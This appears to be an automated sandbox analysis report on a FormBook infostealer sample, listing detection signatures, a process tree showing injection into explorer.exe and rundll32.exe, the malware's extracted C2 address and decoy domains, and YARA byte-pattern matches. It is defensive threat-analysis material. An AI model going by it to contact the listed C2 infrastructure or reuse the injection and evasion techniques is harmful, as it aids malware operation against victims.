Edit tour

Windows Analysis Report
SecuriteInfo.com.FileRepMalware.16340.31219.exe

Overview

General Information

Sample Name:	SecuriteInfo.com.FileRepMalware.16340.31219.exe
Analysis ID:	1336550
MD5:	0c57a7aae080fd2eac42a31fa5b7f051
SHA1:	2e181788e6dec9e170556e2daa39a61dc2bf8b89
SHA256:	87770248637ba53e2fd2c65ec24b95659d9b1f2d3af87234601fd720f81d6fd8
Tags:	exeFormbook
Infos:

Detection

FormBook, NSISDropper

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected FormBook

Malicious sample detected (through community Yara rule)

Yara detected NSISDropper

Antivirus / Scanner detection for submitted sample

System process connects to network (likely due to code injection or exploit)

Antivirus detection for URL or domain

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Snort IDS alert for network traffic

Sample uses process hollowing technique

Maps a DLL or memory area into another process

Performs DNS queries to domains with low reputation

Modifies the prolog of user mode functions (user mode inline hooks)

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Queues an APC in another process (thread injection)

Tries to detect virtualization through RDTSC time measurements

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Uses 32bit PE files

Found decision node followed by non-executed suspicious APIs

Queries the volume information (name, serial number etc) of a device

Yara signature match

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

HTTP GET or POST without a user agent

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Extensive use of GetProcAddress (often used to hide API calls)

Allocates memory with a write watch (potentially for evading sandboxes)

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Checks if the current process is being debugged

Dropped file seen in connection with other malware

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w10x64

SecuriteInfo.com.FileRepMalware.16340.31219.exe (PID: 5364 cmdline: C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.16340.31219.exe MD5: 0C57A7AAE080FD2EAC42A31FA5B7F051)

xheuzyg.exe (PID: 1356 cmdline: "C:\Users\user~1\AppData\Local\Temp\xheuzyg.exe" MD5: 25D54D83B6D68CAF9DE7655FF5E33651)

conhost.exe (PID: 4672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

xheuzyg.exe (PID: 1664 cmdline: C:\Users\user~1\AppData\Local\Temp\xheuzyg.exe MD5: 25D54D83B6D68CAF9DE7655FF5E33651)

explorer.exe (PID: 4056 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

rundll32.exe (PID: 4312 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: 889B99C52A60DD49227C5E485A016679)

cmd.exe (PID: 5336 cmdline: /c del "C:\Users\user~1\AppData\Local\Temp\xheuzyg.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

SkypeApp.exe (PID: 3840 cmdline: "C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exe" -ServerName:App.AppXffn3yxqvgawq9fpmnhy90fr3y01d1t5b.mca MD5: 7F4A25126DC7ABB0A94B1BC62587AF37)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/ https://asec.ahnlab.com/en/32149/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.glocraze.com/ju29/"], "decoy": ["xpermate.com", "bacheckadress.top", "jsrents.com", "xuangesmd.com", "mnchentampere.com", "iamdebs.com", "gwadkoup.com", "shoplittlezenone.shop", "jokergiftcard.buzz", "durufilmyapim.com", "sahabatterbaik19.xyz", "decode.tax", "wokeeducationhateskids.com", "klxcv.xyz", "dosfronterastx.com", "desertmoneymedia.com", "coynemanagement.online", "housesstore.com", "refreshquota.site", "hijama-pro.com", "gaming-chairs-vn-vi-2885437.fyi", "tuesdaymorningwuwu.com", "olivealley.online", "lineyours.com", "giollgoshop.site", "kelashealing.com", "spisanierussiadolgfaster.store", "bodacristianyjuani.com", "shop-hustlermindset.com", "theadelts.com", "umertazkeer.com", "infinitytrustbank.com", "thauthia12.click", "shutupandjam.net", "magick-cat.com", "power-pro.online", "wealthwithkate.com", "ascorpii.com", "quasi-discreetanga.best", "mzfgwh.top", "christopherromanski.online", "townstart.shop", "dwijtechnology.com", "rezultman.info", "e9pf4s.top", "pabmb5.top", "kprgrecruiting.com", "betmcc.pro", "girlypopups.com", "sellwithimam.com", "affordable58078.com", "sextapevidhot.com", "zg9tywlubmftzw5ldzmzmzk.com", "dilapakku.com", "tabareviera.com", "helpers4us.com", "sklm888.com", "greenspaces.xyz", "merchascarpamici.com", "ibrahimalnajjar.com", "xxds02.com", "idsuper-21.online", "naaraelucas.com", "hearing-aid-new.click"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000006.00000002.3707868770.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000006.00000002.3707868770.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.3707868770.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000006.00000002.3707868770.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000002.3707868770.0000000000BD0000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.1285843211.00000000010C0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.1285843211.00000000010C0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.1285843211.00000000010C0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000004.00000002.1285843211.00000000010C0000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.1285843211.00000000010C0000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.1230578610.0000000002F50000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000002.00000002.1230578610.0000000002F50000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.1230578610.0000000002F50000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000002.00000002.1230578610.0000000002F50000.00000004.00001000.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000002.00000002.1230578610.0000000002F50000.00000004.00001000.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000002.1230484201.0000000001380000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_NSISDropper	Yara detected NSISDropper	Joe Security
00000004.00000002.1285538646.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.1285538646.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.1285538646.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000004.00000002.1285538646.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.1285538646.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000002.3695174278.0000000000120000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000002.3707426507.0000000000BA0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000006.00000002.3707426507.0000000000BA0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.3707426507.0000000000BA0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000006.00000002.3707426507.0000000000BA0000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000002.3707426507.0000000000BA0000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.1285810660.0000000001090000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.1285810660.0000000001090000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.1285810660.0000000001090000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000004.00000002.1285810660.0000000001090000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.1285810660.0000000001090000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: xheuzyg.exe PID: 1356	Windows_Trojan_Formbook_1112e116	unknown	unknown	0xa5ce8:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: xheuzyg.exe PID: 1664	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x95f37:$a1: 3C 30 50 4F 53 54 74 09 40 0xa403b:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: rundll32.exe PID: 4312	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x31b1:$a1: 3C 30 50 4F 53 54 74 09 40 0xbc377:$a1: 3C 30 50 4F 53 54 74 09 40 0xc101b:$a1: 3C 30 50 4F 53 54 74 09 40
Click to see the 34 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
4.2.xheuzyg.exe.400000.1.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
4.2.xheuzyg.exe.400000.1.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
4.2.xheuzyg.exe.400000.1.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5451:$a1: 3C 30 50 4F 53 54 74 09 40 0x1bdb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x9bbf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x14aa7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
4.2.xheuzyg.exe.400000.1.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
4.2.xheuzyg.exe.400000.1.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17a39:$sqlite3step: 68 34 1C 7B E1 0x17b4c:$sqlite3step: 68 34 1C 7B E1 0x17a68:$sqlite3text: 68 38 2A 90 C5 0x17b8d:$sqlite3text: 68 38 2A 90 C5 0x17a7b:$sqlite3blob: 68 53 D8 7F 8C 0x17ba3:$sqlite3blob: 68 53 D8 7F 8C
2.2.xheuzyg.exe.2f50000.1.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
2.2.xheuzyg.exe.2f50000.1.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.xheuzyg.exe.2f50000.1.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
2.2.xheuzyg.exe.2f50000.1.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
2.2.xheuzyg.exe.2f50000.1.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
2.2.xheuzyg.exe.2f50000.1.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
2.2.xheuzyg.exe.2f50000.1.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.xheuzyg.exe.2f50000.1.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5451:$a1: 3C 30 50 4F 53 54 74 09 40 0x1bdb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x9bbf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x14aa7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
2.2.xheuzyg.exe.2f50000.1.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1ab17:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1bb1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
